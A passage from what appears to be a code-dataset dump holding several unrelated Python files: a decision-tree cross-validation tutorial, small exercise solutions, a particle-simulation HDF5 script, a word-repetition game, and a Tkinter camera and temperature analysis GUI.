scoring=\"roc_auc\",\n n_jobs=-1,\n cv=cv,\n refit=True,\n return_train_score=True,\n )\n\n # With all settings in place, we can fit GridSearchCV just like any other model:\n gridsearch_clf.fit(X=X, y=y_binary)\n\n # The training process produces some new attributes for our GridSearchCV object, most importantly the information\n # about the optimal settings and the best cross-validation score (now using the proper setup that avoids lookahead\n # bias). Setting `max_depth` to 10, `min_samples_leaf` to 750, and randomly selecting only a number corresponding\n # to the square root of the total number of features when deciding on a split, produces the best results, with an\n # AUC of 0.532:\n print(gridsearch_clf.best_params_)\n print(gridsearch_clf.best_score_)\n\n #### Define Custom IC score\n def rank_correl(y, y_pred):\n return spearmanr(y, y_pred)[0]\n\n ic = make_scorer(rank_correl)\n\n #### Regression Tree\n reg_tree = DecisionTreeRegressor(random_state=42)\n\n gridsearch_reg = GridSearchCV(\n estimator=reg_tree,\n param_grid=param_grid,\n scoring=ic,\n n_jobs=-1,\n cv=cv,\n refit=True,\n return_train_score=True,\n )\n gridsearch_reg.fit(X=X, y=y)\n print(gridsearch_reg.best_params_)\n print(gridsearch_reg.best_score_)\n\n print(\n pd.DataFrame(\n {\n \"Regression\": pd.Series(gridsearch_reg.best_params_),\n \"Classification\": pd.Series(gridsearch_clf.best_params_),\n }\n )\n )\n\n ### Classifier Cross-Validation is the most important tool to obtain an unbiased estimate of the generalization error,\n # which in turn permits an informed choice among the various configuration options. sklearn offers several tools to\n # facilitate the process of cross-validating numerous parameter settings, namely the GridSearchCV convenience class\n # that we will illustrate in the next section. The following code illustrates how to run cross-validation more\n # manually to obtain custom tree attributes, such as the total number of nodes or leaf nodes associated with certain\n # hyperparameter settings. The following function accesses the internal `.tree_` attribute to retrieve information\n # about the total node count, and how many of these nodes are leaf nodes:\n def get_leaves_count(tree):\n t = tree.tree_\n n = t.node_count\n leaves = len([i for i in range(t.node_count) if t.children_left[i] == -1])\n return leaves\n\n # We can combine this information with the train and test scores to gain detailed knowledge about the model behavior\n # throughout the cross-validation process, as follows:\n train_scores, val_scores, leaves = {}, {}, {}\n for max_depth in max_depths:\n print(max_depth, end=\" \", flush=True)\n clf = DecisionTreeClassifier(\n criterion=\"gini\",\n max_depth=max_depth,\n min_samples_leaf=5,\n max_features=\"sqrt\",\n random_state=42,\n )\n train_scores[max_depth], val_scores[max_depth], leaves[max_depth] = [], [], []\n for train_idx, test_idx in cv.split(X):\n X_train, y_train, = (\n X.iloc[train_idx],\n y_binary.iloc[train_idx],\n )\n X_test, y_test = X.iloc[test_idx], y_binary.iloc[test_idx]\n clf.fit(X=X_train, y=y_train)\n\n train_pred = clf.predict_proba(X=X_train)[:, 1]\n train_score = roc_auc_score(y_score=train_pred, y_true=y_train)\n train_scores[max_depth].append(train_score)\n\n test_pred = clf.predict_proba(X=X_test)[:, 1]\n val_score = roc_auc_score(y_score=test_pred, y_true=y_test)\n val_scores[max_depth].append(val_score)\n leaves[max_depth].append(get_leaves_count(clf))\n\n clf_train_scores = pd.DataFrame(train_scores)\n clf_valid_scores = pd.DataFrame(val_scores)\n clf_leaves = pd.DataFrame(leaves)\n\n clf_cv_data = pd.concat(\n [\n pd.melt(clf_train_scores, var_name=\"Max. Depth\", value_name=\"ROC AUC\").assign(\n Data=\"Train\"\n ),\n pd.melt(clf_valid_scores, var_name=\"Max. Depth\", value_name=\"ROC AUC\").assign(\n Data=\"Valid\"\n ),\n ]\n )\n\n ### Regression tree cross-validation\n #### Run cross-validation\n train_scores, val_scores, leaves = {}, {}, {}\n for max_depth in max_depths:\n print(max_depth, end=\" \", flush=True)\n reg_tree = DecisionTreeRegressor(\n max_depth=max_depth, min_samples_leaf=50, max_features=\"sqrt\", random_state=42\n )\n train_scores[max_depth], val_scores[max_depth], leaves[max_depth] = [], [], []\n for train_idx, test_idx in cv.split(X):\n X_train, y_train, = (\n X.iloc[train_idx],\n y.iloc[train_idx],\n )\n X_test, y_test = X.iloc[test_idx], y.iloc[test_idx]\n reg_tree.fit(X=X_train, y=y_train)\n\n train_pred = reg_tree.predict(X=X_train)\n train_score = spearmanr(train_pred, y_train)[0]\n train_scores[max_depth].append(train_score)\n\n test_pred = reg_tree.predict(X=X_test)\n val_score = spearmanr(test_pred, y_test)[0]\n val_scores[max_depth].append(val_score)\n leaves[max_depth].append(get_leaves_count(reg_tree))\n\n reg_train_scores = pd.DataFrame(train_scores)\n reg_valid_scores = pd.DataFrame(val_scores)\n reg_leaves = pd.DataFrame(leaves)\n\n reg_cv_data = (\n pd.melt(reg_train_scores, var_name=\"Max. Depth\", value_name=\"IC\")\n .assign(Data=\"Train\")\n .append(\n pd.melt(reg_valid_scores, var_name=\"Max. Depth\", value_name=\"IC\").assign(Data=\"Valid\")\n )\n .reset_index()\n )\n\n ### Compare CV Results\n fig, axes = plt.subplots(ncols=2, figsize=(14, 5))\n # sns.lineplot(data=reg_cv_data, x=\"Max. Depth\", y=\"IC\", hue=\"Data\", ci=95, ax=axes[0], lw=2)\n\n axes[0].set_title(\"Regression Tree\")\n axes[0].axvline(x=reg_valid_scores.mean().idxmax(), ls=\"--\", c=\"k\", lw=1)\n axes[0].axhline(y=0, ls=\"--\", c=\"k\", lw=1)\n\n # sns.lineplot(data=clf_cv_data, x=\"Max. Depth\", y=\"ROC AUC\", hue=\"Data\", ci=95, ax=axes[1], lw=2)\n\n axes[1].set_title(\"Classification Tree\")\n axes[1].axvline(x=clf_valid_scores.mean().idxmax(), ls=\"--\", c=\"k\", lw=1)\n axes[1].axhline(y=0.5, ls=\"--\", c=\"k\", lw=1)\n for ax in axes:\n ax.set_xlim(min(param_grid[\"max_depth\"]), max(param_grid[\"max_depth\"]))\n\n fig.suptitle(f\"Train-Validation Scores\", fontsize=14)\n fig.tight_layout()\n fig.subplots_adjust(top=0.91)\n plt.savefig(\"images/01-04.png\")\n\n ### Learning Curves for best models\n # A learning curve is a useful tool that displays how the validation and training score evolve as the number of\n # training samples evolves. The purpose of the learning curve is to find out whether and how much the model would\n # benefit from using more data during training. It is also useful to diagnose whether the model's generalization\n # error is more likely driven by bias or variance. If, for example, both the validation score and the training score\n # converge to a similarly low value despite an increasing training set size, the error is more likely due to bias,\n # and additional training data is unlikely to help.\n\n #### Classifier\n sizes = np.arange(0.1, 1.01, 0.1)\n\n train_sizes, train_scores, valid_scores = learning_curve(\n gridsearch_clf.best_estimator_,\n X,\n y_binary,\n train_sizes=sizes,\n cv=cv,\n scoring=\"roc_auc\",\n n_jobs=-1,\n shuffle=True,\n random_state=42,\n )\n\n clf_lc_data = pd.concat(\n [\n pd.melt(\n pd.DataFrame(train_scores.T, columns=train_sizes),\n var_name=\"Train Size\",\n value_name=\"ROC AUC\",\n ).assign(Data=\"Train\"),\n pd.melt(\n pd.DataFrame(valid_scores.T, columns=train_sizes),\n var_name=\"Train Size\",\n value_name=\"ROC AUC\",\n ).assign(Data=\"Valid\"),\n ]\n )\n clf_lc_data.info()\n\n #### Regression Tree\n train_sizes, train_scores, valid_scores = learning_curve(\n gridsearch_reg.best_estimator_,\n X,\n y,\n train_sizes=sizes,\n cv=cv,\n scoring=ic,\n n_jobs=-1,\n shuffle=True,\n random_state=42,\n )\n\n reg_lc_data = pd.concat(\n [\n pd.melt(\n pd.DataFrame(train_scores.T, columns=train_sizes),\n var_name=\"Train Size\",\n value_name=\"IC\",\n ).assign(Data=\"Train\"),\n pd.melt(\n pd.DataFrame(valid_scores.T, columns=train_sizes),\n var_name=\"Train Size\",\n value_name=\"IC\",\n ).assign(Data=\"Valid\"),\n ]\n )\n reg_lc_data.info()\n\n #### Compare Learning Curves\n fig, axes = plt.subplots(ncols=2, figsize=(14, 5))\n xmin, xmax = reg_lc_data[\"Train Size\"].min(), reg_lc_data[\"Train Size\"].max()\n\n # sns.lineplot(data=reg_lc_data, x=\"Train Size\", y=\"IC\", hue=\"Data\", ci=95, ax=axes[0], lw=2)\n\n axes[0].set_title(\"Best Regression Tree\")\n axes[0].set_ylabel(\"IC\")\n\n axes[0].xaxis.set_major_formatter(FuncFormatter(lambda x, _: \"{:,.0f}\".format(x)))\n\n sns.lineplot(data=clf_lc_data, x=\"Train Size\", y=\"ROC AUC\", hue=\"Data\", ci=95, ax=axes[1], lw=2)\n axes[1].set_title(\"Best Classification Tree\")\n axes[1].set_ylabel(\"ROC AUC\")\n axes[1].xaxis.set_major_formatter(FuncFormatter(lambda x, _: \"{:,.0f}\".format(x)))\n\n for i in [0, 1]:\n axes[i].tick_params(axis=\"both\", which=\"major\", labelsize=10)\n axes[i].tick_params(axis=\"both\", which=\"minor\", labelsize=8)\n axes[i].set_xlim(xmin, xmax)\n\n fig.suptitle(\"Learning Curves\", fontsize=14)\n fig.tight_layout()\n fig.subplots_adjust(top=0.9)\n plt.savefig(\"images/01-06.png\")\n\n ### Feature Importance\n # Decision trees can not only be visualized to inspect the decision path for a given feature, but also provide a\n # summary measure of the contribution of each feature to the model fit to the training data. The feature importance\n # captures how much the splits produced by the feature helped to optimize the model's metric used to evaluate the\n # split quality, which in our case is the Gini Impurity index.\n # A feature's importance is computed as the (normalized) total reduction of this metric and takes into account the\n # number of samples affected by a split. Hence, features used earlier in the tree where the nodes tend to contain\n # more samples typically are considered of higher importance.\n\n top_n = 15\n labels = X.columns.str.replace(\"_\", \" \").str.upper()\n fi_clf = (\n pd.Series(gridsearch_clf.best_estimator_.feature_importances_, index=labels)\n .sort_values(ascending=False)\n .iloc[:top_n]\n )\n fi_reg = (\n pd.Series(gridsearch_reg.best_estimator_.feature_importances_, index=labels)\n .sort_values(ascending=False)\n .iloc[:top_n]\n )\n\n fig, axes = plt.subplots(ncols=2, figsize=(12, 4), sharex=True)\n color = cm.Blues(np.linspace(0.4, 0.9, top_n))\n fi_clf.sort_values().plot.barh(ax=axes[1], title=\"Classification Tree\", color=color)\n fi_reg.sort_values().plot.barh(ax=axes[0], title=\"Regression Tree\", color=color)\n axes[0].set_xlabel(\"Feature Importance\")\n axes[1].set_xlabel(\"Feature Importance\")\n fig.suptitle(f\"Top {top_n} Features\", fontsize=14)\n sns.despine()\n fig.tight_layout()\n fig.subplots_adjust(top=0.9)\n plt.savefig(\"images/01-07.png\")\n","repo_name":"mecha2k/ml-algorithm-trading-2nd","sub_path":"src/11 decision_trees_random_forests/01_decision_trees.py","file_name":"01_decision_trees.py","file_ext":"py","file_size_in_byte":40880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"43337129429","text":"import sys\r\n\r\ntotal = int(input())\r\ntypes = int(input())\r\ncheck = 0\r\n\r\nfor i in range(types):\r\n a, b = map(int, sys.stdin.readline().split())\r\n check += (a*b)\r\n\r\nif check == total:\r\n print('Yes')\r\nelse:\r\n print('No')\r\n ","repo_name":"HistoryDan/problem-solving","sub_path":"백준/Bronze/25304. 영수증/영수증.py","file_name":"영수증.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"19722178953","text":"import h5py\nimport numpy as np\nimport ParticleSys as ps\nimport matplotlib.pyplot as plt\nplt.style.use('elegant.mplstyle')\nl1=np.array([ps.Particle(30+np.linspace(0,400,1000)[i],\n 10+np.linspace(0,400,1000)[i],\n 100,100,0.2,1) for i in range(1000)])\nl2=np.array([ps.Particle(5+np.linspace(0,400,1000)[i],\n 20+np.linspace(0,400,1000)[i],\n 100,100,0.2,1) for i in range(1000)])#初始化点\nal=np.hstack([l1,l2])\nwall=ps.Wall()\nf=h5py.File(\"HDF5Data.h5\",\"w\")\ng=f.create_group(\"input_data\")\npcs=ps.ParticleSystem(True,wall,al,g)\nax=plt.subplot(111)\npcs.show(ax)\npcs.in_write_hdf5(0.05,30,0.2)\nplt.show()#*展示点分布\nf.flush()\nf.close()\n\n\n\n","repo_name":"lsyxiaopang/Particle-Simulation","sub_path":"IO/HDFin.py","file_name":"HDFin.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44263242538","text":"# Lista composta e análise de dados\ndado = []\nregistros = []\nmenorPeso = maiorPeso = 0\ncontinuar = 'S'\nwhile continuar != 'N':\n dado.append(str(input('Nome: ')))\n dado.append(float(input('Peso: ')))\n continuar = str(input('Quer continuar? [S/N] ')).strip().upper()\n if len(registros) == 0:\n menorPeso = maiorPeso = dado[1]\n if menorPeso >= dado[1]:\n menorPeso = dado[1]\n if maiorPeso <= dado[1]:\n maiorPeso = dado[1]\n registros.append(dado[:])\n dado.clear()\nprint('-'*33)\nprint(f'Ao todo, você cadastrou {len(registros)} pessoas.')\nprint(f'O maior peso foi de {maiorPeso}kg, de ', end='')\nfor p in registros:\n if p[1] == maiorPeso:\n print(f'{p[0]} ', end='')\nprint(f'\\nO menor peso foi de {menorPeso}kg, de ', end='')\nfor p in registros:\n if p[1] == menorPeso:\n print(f'{p[0]} ', end='')\n","repo_name":"opaulolopes/myFreshStart","sub_path":"Python/Python - Mundo 3/ex084.py","file_name":"ex084.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19454136492","text":"import time\n\nfrom players.player_moves_heuristic import PlayerMoveHeu\nfrom players.player_utc import PlayerUCT\nfrom utility import *\nfrom utility2 import *\n\ncomputer_player_list = [[\"Komputer losowy\", PlayerRng], [\"Komputer UCT\", PlayerUCT],\n [\"Komputer heurystyka ilości ruchów\", PlayerMoveHeu]\n ]\n\npl_dict_gamemode = {\"1\": [\"Człowiek\", HumanPlayer]}\npl_dict_testmode = {}\n\ni = 1\nfor pl in computer_player_list:\n pl_dict_gamemode[str(i+1)] = pl\n pl_dict_testmode[str(i)] = pl\n i = i + 1\n\ndel_dict = {\"1\": [\"Nie\", False],\n \"2\": [\"Tak\", True]}\n\nbase_alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\n# base_alphabet = ['a', 'b', 'c']\n\n\nclass AtoGame:\n def __init__(self):\n # game parameters\n self.alph_count = -1\n self.word_length = -1\n self.p1 = None\n self.p2 = None\n self.alphabet = []\n\n # game variables\n self.log = []\n self.word = []\n self.winner = -1\n self.repetition = None\n\n # mode setter\n self.gamemode = True\n\n # gamemode parameters\n self.delay = -1\n self.separator = \"\"\n\n\n def set_testmode_parameters(self):\n self.gamemode = False\n self.set_game_parameters()\n self.set_players(pl_dict_testmode)\n pass\n\n def set_game_parameters(self):\n print(\"Wybierz liczność alfabetu\")\n self.alph_count = pick_int(min=1)\n\n print(\"Wybierz długość słowa\")\n self.word_length = pick_int(min=1)\n\n self.alphabet = generate_alphabet(self.alph_count, base_alphabet)\n\n def set_gamemode_parameters(self):\n self.gamemode = True\n self.set_game_parameters()\n self.set_players(pl_dict_gamemode)\n\n if not isinstance(self.p1, HumanPlayer) or not isinstance(self.p2, HumanPlayer):\n print(\"Wyamagać kliknięcia przed wykonaniem ruchu komputera?\")\n self.delay = pick_option(del_dict)\n\n if self.alph_count > len(base_alphabet):\n self.separator = \"|\"\n else:\n self.separator = \"\"\n\n def set_players(self, pl_dict: dict):\n print(\"Wybierz gracza 1:\")\n self.p1 = pick_option(pl_dict)()\n\n print(\"Wybierz gracza 2:\")\n self.p2 = pick_option(pl_dict)()\n\n def print_parameters(self, end = \"\\n\"):\n print(f\"Parametry gry: \\nLiczność alfabetu: {self.alph_count} | Maks. dł. słowa: {self.word_length} | \\nGracz 1: {self.p1.to_string()} | Gracz 2: {self.p2.to_string()}\", end=end)\n\n def play(self):\n self.word = []\n # self.move = 0\n self.log = []\n word_analisys = {}\n self.winner = -1\n\n comp_only = not isinstance(self.p1, HumanPlayer) and not isinstance(self.p2, HumanPlayer)\n\n clear()\n\n while True:\n\n if self.gamemode and not comp_only:\n clear()\n if len(self.word) != 0:\n if self.gamemode:\n if not comp_only:\n print(\"Ruch gracza 1:\")\n if not isinstance(self.p1, HumanPlayer) and self.delay:\n _ = input(\"(enter żeby gracz wykonał ruch)\")\n\n move1 = self.p1.make_move_1(self.word, self.alphabet, word_analisys, self.separator, word_length=self.word_length)\n\n # if self.gamemode:\n # print(ato_word_to_string(word=self.word, marker=move1, sep=self.separator))\n else:\n move1 = 0\n\n self.log.append(move1)\n if self.gamemode and comp_only:\n print(\"Stan gry po ruchu gracza 1: \" + ato_word_to_string(self.word, marker=move1, sep=self.separator))\n time.sleep(0.75)\n\n if self.gamemode:\n if not comp_only:\n clear()\n print(\"Ruch gracza 2:\")\n if not isinstance(self.p2, HumanPlayer) and self.delay:\n _ = input(\"(enter żeby gracz wykonał ruch)\")\n\n move2 = self.p2.make_move_2(self.word, self.alphabet, position=move1, word_analisys=word_analisys, separator=self.separator, word_length=self.word_length)\n\n self.log.append(move2)\n self.word.insert(move1, move2)\n if self.gamemode and comp_only:\n print(\"Stan gry po ruchu gracza 2: \" + ato_word_to_string(self.word, sep=self.separator))\n time.sleep(0.75)\n\n is_rep, self.repetition, word_analisys = analyse_word(self.word)\n\n if len(self.log) > 2 * self.word_length:\n ori = 1\n\n if is_rep:\n self.winner = 1\n break\n elif len(self.word) == self.word_length:\n self.winner = 2\n break\n\n def print_result(self):\n if self.winner == 1:\n print(f\"Gracz 1 wygrywa. W słowie '{ato_word_to_string(self.word, sep=self.separator)}' na miejscu {self.repetition[0]} jest powtórzenie w promieniu {self.repetition[1]}.\")\n else:\n print(f\"Gracz 2 wygrywa. Słowo '{ato_word_to_string(self.word, sep=self.separator)}' ma długość {self.word_length} i nie zawiera powtórzeń.\")\n\n print(short_sep)\n print(f\"Kolejne ruchy: {flatten_list_of_strings(self.log, ',')}\")\n","repo_name":"ATruszczynski/gkns_projekt","sub_path":"ato_game.py","file_name":"ato_game.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44337524193","text":"import tkinter as tk\nfrom tkinter import ttk, messagebox\nfrom PIL import Image, ImageTk\nfrom modules.Camera import Camera\nfrom modules.Settings import Settings\nfrom modules.RealTime import RealTime\nfrom modules.MouseCropper import MouseCropper\nfrom modules.TempReader import TempReader\ntemperaturePort = '/dev/ttyACM0'\nimport time\nimport cv2\nimport os\nimport asyncio\nimport threading\nimport matplotlib as mpl\nmpl.use('TkAgg')\nfrom matplotlib import style\nstyle.use('ggplot')\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.backends.backend_tkagg import NavigationToolbar2Tk\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\n\n\n\nclass RealTimeAnalysis(tk.Frame):\n def __init__(self, *args, **kwargs):\n tk.Frame.__init__(self, *args, **kwargs)\n settings = Settings.getInstance()\n self.camera = Camera(settings.cameraNumber)\n self.delayOptions = 2000\n self.delay = 18\n self.realTimeList = []\n self.TempReader = TempReader()\n self.current_Temp = 0\n self.do_temp = False\n self.do_graph = False\n\n self.container = tk.Frame(self)\n self.container.grid()\n\n ############ AREA #################\n areaContainer = tk.Frame(self.container)\n areaContainer.grid(row=0, column=0, columnspan=3, sticky='N')\n\n self.label10 = ttk.Label(areaContainer, text='Area Settings', font='Helvetica 10 bold')\n self.label10.grid(row=0, column=0, columnspan=3)\n\n self.scrollbar = ttk.Scrollbar(areaContainer, orient='vertical')\n self.scrollbar.grid(row=1, column=2, sticky='WNS')\n self.listbox = tk.Listbox(areaContainer, selectmode='EXTENDED')\n self.listbox.grid(row=1, column=0, columnspan=3, padx=5, sticky='WE')\n self.listbox.config(yscrollcommand=self.scrollbar.set)\n self.scrollbar.config(command=self.listbox.yview)\n\n self.addareabutton = ttk.Button(areaContainer, text='Add', command=self.addAreaFunc)\n self.addareabutton.grid(row=2, column=0)\n self.deletebutton = ttk.Button(areaContainer, text='Delete', command=self.deleteSelection)\n self.deletebutton.grid(row=2, column=1)\n\n ################ MAKE DATA OPTIONS ###################\n\n self.makeDataContainer = tk.Frame(self.container)\n self.makeDataContainer.grid(row=1, column=0, sticky='N', columnspan=3)\n\n self.label11 = ttk.Label(self.makeDataContainer, text='Make Data Settings', font='Helvetica 10 bold')\n self.label11.grid(row=0, column=0, columnspan=3)\n\n self.label12 = ttk.Label(self.makeDataContainer, text='Making Data Time method: ')\n self.label12.grid(row=1, column=0)\n self.makeDataTimeList = ['Count of Photos', 'Count of Time']\n self.makeDataTimeList.insert(0, self.makeDataTimeList[0])\n self.variable4 = tk.StringVar(self.makeDataContainer)\n self.variable4.set(self.makeDataTimeList[0])\n self.dropdownmenu4 = ttk.OptionMenu(self.makeDataContainer, self.variable4, *self.makeDataTimeList,\n command=self.makeDataTimeMethodInterfaceUpdate)\n self.dropdownmenu4.grid(row=1, column=1, sticky='ew')\n\n self.label13 = ttk.Label(self.makeDataContainer, text='Making Data Photo method: ')\n self.label13.grid(row=2, column=0)\n self.makeDataPhotoList = ['Count of Frames']\n self.makeDataPhotoList.insert(0, self.makeDataPhotoList[0])\n self.variable5 = tk.StringVar(self.makeDataContainer)\n self.variable5.set(self.makeDataPhotoList[0])\n self.dropdownmenu5 = ttk.OptionMenu(self.makeDataContainer, self.variable5, *self.makeDataPhotoList, command='')\n self.dropdownmenu5.grid(row=2, column=1, sticky='ew')\n\n self.makeDataFramesContainer = tk.Frame(self.makeDataContainer)\n self.makeDataFramesContainer.grid(row=2, column=2)\n self.makeDataFramesSpinboxVar = tk.StringVar(self.makeDataFramesContainer)\n self.makeDataCountOfFramesSpinbox = tk.Spinbox(self.makeDataFramesContainer, from_=0, to=144,\n textvariable=self.makeDataFramesSpinboxVar,\n width=21, command=self.makeDataUpdateCountOfFrames)\n self.makeDataCountOfFramesSpinbox.grid(row=0, column=0)\n\n ################# START/CANCEL ##################\n self.async_loop = asyncio.get_event_loop()\n startstopContainer = tk.Frame(self.container)\n startstopContainer.grid(row=2, column=0, sticky='N', columnspan=3)\n self.startButton = ttk.Button(startstopContainer, text='Start', command=lambda: self.do_tasks(self.async_loop))\n self.startButton.grid(row=1, column=0)\n self.stopButton = ttk.Button(startstopContainer, text='Cancel', command=self.cancel)\n self.stopButton.grid(row=1, column=1)\n\n ############ RIGHT ###############\n cameraCheckContainer = tk.Frame(self.container)\n cameraCheckContainer.grid(row=0, column=3, rowspan=3)\n\n # ### CAMERA PREVIEW CHECK ###\n # self.checkVar = tk.IntVar()\n # self.checkbutton = tk.Checkbutton(cameraCheckContainer, variable=self.checkVar, text='Camera Preview',\n # command=self.checkClick)\n # self.checkbutton.grid(row=0, column=0, sticky='W')\n #\n # cameraContainer = tk.Frame(cameraCheckContainer)\n # cameraContainer.grid(row=1, column=0, rowspan=2, sticky='N')\n # ### CAMERA PREVIEW ###\n # self.cameraWindow = tk.Canvas(cameraContainer, width=640, height=480)\n # self.cameraWindow.grid(row=0, column=0, columnspan=2)\n\n self.makeClearGraph()\n self.updateAreasFromOptions()\n self.makeDataFramesSetFromOptions()\n #self.update()\n self.makeDataTimeMethodInterfaceUpdate('')\n\n self.createGraphSwitchers()\n self.drawGraph()\n\n\n def temperatureGetter(self):\n self.current_Temp = self.TempReader.readTemp(temperaturePort)\n\n try:\n for i in self.realTimeList:\n i.currentTemp = self.current_Temp\n\n except:\n pass\n\n if self.do_temp:\n self.after(1000, self.temperatureGetter)\n\n def createGraphSwitchers(self):\n try:\n self.switchersContainer.grid_forget()\n except:\n pass\n\n settings = Settings.getInstance()\n self.switchersContainer = tk.Frame(self)\n self.switchersContainer.grid(row=1, column=4, columnspan=2, sticky='N')\n\n self.areasList = []\n\n try:\n for i in range(1, len(settings.areasList)):\n if settings.areasList[i] not in self.areasList:\n self.areasList.append(str(settings.areasList[i]))\n\n\n self.areasList.insert(0, self.areasList[0])\n self.areasListVar = tk.StringVar(self.switchersContainer)\n self.areasListVar.set(self.areasList[0])\n self.areasGraphOptionMenu = ttk.OptionMenu(self.switchersContainer, self.areasListVar, *self.areasList,\n command=self.drawGraph)\n self.areasGraphOptionMenu.grid(row=0, column=0)\n\n except:\n pass\n\n self.xList = ['temperature', 'time']\n self.xList.insert(0, self.xList[0])\n self.xListVar = tk.StringVar(self.switchersContainer)\n self.xListVar.set(self.xList[0])\n\n self.xOptionMenu = ttk.OptionMenu(self.switchersContainer, self.xListVar, *self.xList, command=self.drawGraph)\n self.xOptionMenu.grid(row=0, column=1)\n\n def makeClearGraph(self):\n self.f = Figure(figsize=(8, 5), dpi=100)\n self.avg = self.f.add_subplot(111)\n self.Canvas = FigureCanvasTkAgg(self.f, master=self)\n self.Canvas.get_tk_widget().grid(row=0, column=4, columnspan=3)\n self.toolbar_frame = tk.Frame(self)\n self.Toolbar = NavigationToolbar2Tk(self.Canvas, self.toolbar_frame)\n self.Toolbar.update()\n self.toolbar_frame.grid(row=1, column=6)\n\n\n # self.toolbar_frame = tk.Frame(self)\n # self.Myfig = plt.figure()\n # self.Canvas = FigureCanvasTkAgg(self.Myfig, master=self)\n # self.Toolbar = NavigationToolbar2Tk(self.Canvas, self.toolbar_frame)\n # self.Toolbar.update()\n # self.toolbar_frame.grid(row=1, column=4)\n # self.Canvas._tkcanvas.grid(row=0, column=4)\n # self.avg = self.Myfig.add_subplot(111)\n\n def drawGraph(self, *args, **kwargs):\n try:\n area = self.areasListVar.get()[1: len(self.areasListVar.get()) - 1].split(',')\n area = [int(x) for x in area]\n area = tuple(area)\n\n for i in range(len(self.realTimeList)):\n if self.realTimeList[i].area == area:\n xtemp = self.realTimeList[i].tempList\n yred = self.realTimeList[i].avR\n ygreen = self.realTimeList[i].avG\n yblue = self.realTimeList[i].avB\n xtime = self.realTimeList[i].timeList\n\n osx = None\n if self.xListVar.get() == 'temperature':\n osx = xtemp\n xlabel = 'Temperature'\n\n if self.xListVar.get() == 'time':\n xlabel = 'Time'\n timelist = []\n for i in range(len(xtime)):\n #timelist.append(time.strftime(\"%H:%M:%S\", time.gmtime(xtime[i] - xtime[0])))\n timelist.append(xtime[i]-xtime[0])\n osx = timelist\n\n if osx != None:\n self.avg.clear()\n self.avg.plot(osx, yred, \"ro\", osx, ygreen, \"go\", osx, yblue, 'bo')\n self.avg.ticklabel_format(useOffset=False, style='plain')\n plt.ylabel('Average of pixels')\n plt.xlabel(xlabel)\n plt.setp(self.avg.get_xticklabels(), rotation=30, horizontalalignment='right')\n self.Canvas.draw()\n #self.Canvas.refresh()\n\n except:\n print(\"Exception w DrawGraph\")\n pass\n\n if self.do_graph:\n self.after(1000, self.drawGraph)\n\n def checkClick(self):\n if self.checkVar.get() == 0:\n self.checkVar.set(1)\n else:\n self.checkVar.set(0)\n\n def update(self):\n settings = Settings.getInstance()\n if self.checkVar.get():\n ret, frame = self.camera.getFrame()\n if ret:\n for i in range(len(settings.areasList)):\n try:\n cv2.rectangle(frame,\n (settings.areasList[i][0], settings.areasList[i][1]),\n (settings.areasList[i][2], settings.areasList[i][3]),\n (0, 255, 0), 1)\n except:\n pass\n self.img = ImageTk.PhotoImage(master=self.cameraWindow, image=Image.fromarray(frame).resize((640, 480)))\n self.cameraWindow.create_image(0, 0, image=self.img, anchor='nw')\n\n if self.checkVar.get() == 0:\n self.cameraWindow.delete(\"all\")\n\n self.after(self.delay, self.update)\n\n def addAreaFunc(self):\n start = time.time()\n while int(time.time() - start) < 2:\n ret, frame = self.camera.getFrame()\n cv2.imwrite('configure.png', frame)\n\n mouseCropper = MouseCropper()\n mouseCropper.configure('configure.png')\n self.left = mouseCropper.left\n self.upper = mouseCropper.upper\n self.right = mouseCropper.right\n self.lower = mouseCropper.lower\n os.remove('configure.png')\n\n self.listbox.insert('end','{}, {}, {}, {}'.format(self.left, self.upper, self.right, self.lower))\n self.updateSettings()\n\n self.createGraphSwitchers()\n\n def deleteSelection(self):\n items = self.listbox.curselection()\n itemToDel = self.listbox.get(self.listbox.curselection())\n itemToDel = tuple(map(int, itemToDel.replace(\" \", \"\").split(',')))\n\n pos = 0\n for i in items:\n idx = int(i) - pos\n self.listbox.delete(idx, idx)\n pos = pos + 1\n\n settings = Settings.getInstance()\n try:\n settings.areasList.remove(itemToDel)\n except:\n pass\n\n def updateAreasFromOptions(self):\n settings = Settings.getInstance()\n for i in range(1,len(settings.areasList)):\n self.listbox.insert('end', '{}, {}, {}, {}'.format(settings.areasList[i][0], settings.areasList[i][1],\n settings.areasList[i][2], settings.areasList[i][3]))\n\n def updateSettings(self):\n settings = Settings.getInstance()\n settings.left = self.left\n settings.upper = self.upper\n settings.right = self.right\n settings.lower = self.lower\n\n if (self.left, self.upper, self.right, self.lower) not in settings.areasList:\n settings.areasList.append((self.left, self.upper, self.right, self.lower))\n\n settings.countOfAreas = len(settings.areasList)\n\n def _asyncio_thread(self, async_loop):\n async_loop.run_until_complete(self.makeData())\n\n def cancel(self):\n for i in self.realTimeList:\n i.do = False\n\n def makingData(self, realTimeObj):\n settings = Settings.getInstance()\n\n if self.variable4.get() == 'Count of Photos':\n realTimeObj.countOfPhoto = int(self.makeDataTimeCountOfPhotosSpinboxVar.get())\n realTimeObj.countOfPhotoDone = 0\n realTimeObj.camera = self.camera\n #realTimeObj.camera = cv2.VideoCapture(settings.cameraNumber)\n realTimeObj.frames = int(self.makeDataFramesSpinboxVar.get())\n realTimeObj.before()\n while realTimeObj.countOfPhotoDone < realTimeObj.countOfPhoto:\n if realTimeObj.do:\n realTimeObj.run()\n realTimeObj.countOfPhotoDone += 1\n else:\n break\n 